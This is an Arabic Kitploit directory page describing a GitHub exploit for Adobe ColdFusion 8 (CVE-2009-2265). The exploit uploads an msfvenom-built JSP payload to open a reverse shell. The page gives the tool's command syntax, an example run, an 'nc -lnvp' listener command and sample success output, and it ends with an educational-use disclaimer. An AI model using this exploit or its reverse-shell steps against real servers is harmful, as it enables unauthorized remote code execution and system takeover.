Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
Adobe-ColdFusion-8-RCE-CVE-2009-2265 — Adobe ColdFusion 8 - تنفيذ الأوامر عن بُعد (RCE) | Kitploit
أدوات/GitHubGitHub/0xdtc/adobe-coldfusion-8-rce-cve-2009-2265
توليد الحمولةتحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويباختبار الاختراقأداة الوصول عن بعد
GitHub0xdtc/adobe-coldfusion-8-rce-cve-2009-2265

Adobe-ColdFusion-8-RCE-CVE-2009-2265

Adobe ColdFusion 8 - تنفيذ الأوامر عن بُعد (RCE)

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة
عرض المستودع
1منذ سنة واحدةلم تتم المراجعة بعد

Adobe ColdFusion 8 - استغلال تنفيذ الأوامر عن بُعد (RCE)

نظرة عامة

يستهدف هذا الاستغلال ثغرة أمنية معروفة في Adobe ColdFusion 8 (CVE-2009-2265). يتيح تنفيذ الأوامر عن بُعد (RCE) عن طريق رفع حمولة JSP ضارة تنشئ اتصال قشرة عكسية.


تفاصيل الاستغلال

  • CVE: CVE-2009-2265
  • الثغرة: معالجة غير صحيحة لرفع الملفات في Adobe ColdFusion 8.
  • الإصدارات المتأثرة: Adobe ColdFusion 8.
  • التأثير: تسمح للمهاجمين بتنفيذ أوامر عشوائية على الخادم.

الميزات

  1. توليد حمولة JSP تلقائياً باستخدام msfvenom.
  2. رفع الحمولة باستخدام طلب POST متعدد الأجزاء.
  3. تشغيل الحمولة لإنشاء قشرة عكسية.
  4. تنظيف ملفات الحمولة المحلية تلقائياً بعد التنفيذ.

طريقة الاستخدام

لاستخدام هذا الاستغلال، تحتاج إلى ما يلي:

  • جهاز كالي لينكس أو بيئة اختبار اختراق مماثلة.
  • تثبيت Netcat للاستماع على المنفذ المحدد.
  • خادم Adobe ColdFusion 8 ضعيف.

صيغة الأمر

root@kitploit:~
./CVE-2009-2265 -l <LHOST> -p <LPORT> -r <RHOST> -q <RPORT>

الوسائط

  • -l <LHOST>: عنوان IP المحلي للمهاجم (مثل: 10.10.16.5).
  • -p <LPORT>: المنفذ المحلي للمهاجم للقشرة العكسية (مثل: 9001).
  • -r <RHOST>: عنوان IP البعيد للهدف (مثل: 10.10.10.11).
  • -q <RPORT>: المنفذ البعيد للهدف حيث يعمل ColdFusion (مثل: 8500).

مثال على الاستخدام

root@kitploit:~
./CVE-2009-2265 -l 10.10.16.5 -p 9001 -r 10.10.10.11 -q 8500
  1. ابدأ مستمعاً على جهاز المهاجم الخاص بك:

    root@kitploit:~
    nc -lnvp 9001
    
  2. قم بتشغيل الاستغلال بالوسائط المناسبة.

  3. بمجرد التنفيذ، ستتصل الحمولة مرة أخرى بالمستمع الخاص بك.


كيف يعمل

  1. توليد الحمولة:

    • يستخدم السكريبت msfvenom لتوليد حمولة JSP ضارة.
    • تبدأ الحمولة قشرة عكسية إلى LHOST و LPORT المحددين.
  2. رفع الحمولة:

    • يتم رفع الحمولة إلى خادم ColdFusion الضعيف باستخدام طلب POST.
  3. تشغيل الحمولة:

    • يتم تنفيذ الحمولة المرفوعة عن طريق إرسال طلب GET إلى عنوان URL للملف.
  4. إنشاء القشرة العكسية:

    • يتم إنشاء قشرة عكسية، مما يمنح المهاجم الوصول إلى النظام المستهدف.

المتطلبات

  • msfvenom لتوليد الحمولة.
  • curl لرفع الملفات وتشغيل الحمولة.
  • nc (Netcat) للاستماع إلى اتصالات القشرة العكسية.

مثال على المخرجات

root@kitploit:~
[+] Generating JSP reverse shell payload...
[+] Payload saved as 'abcd1234-5678-90ef-ghij-1234567890ab.jsp'.
[+] Uploading the payload to the target...
[+] Server response:
    <script type="text/javascript">
        window.parent.OnUploadCompleted(0, "/userfiles/file/abcd1234-5678-90ef-ghij-1234567890ab.jsp", "abcd1234-5678-90ef-ghij-1234567890ab.txt", "0");
    </script>
[+] Waiting for the Netcat listener to start on port 9001...
[+] Netcat listener detected running on port 9001!
[+] Attempting to trigger the payload...
[+] Payload triggered successfully. Check your listener for the reverse shell.
[+] Cleaning up local files...
[+] Done!

إخلاء مسؤولية

هذا السكريبت مخصص لأغراض تعليمية فقط. استخدمه على الأنظمة التي تمتلكها أو لديك إذن صريح لاختبارها. الاستخدام غير المصرح به لهذا الاستغلال على أنظمة لا تمتلكها غير قانوني وغير أخلاقي.


المؤلف

تم تطويره بواسطة [0xDTC].

تنزيل الأداة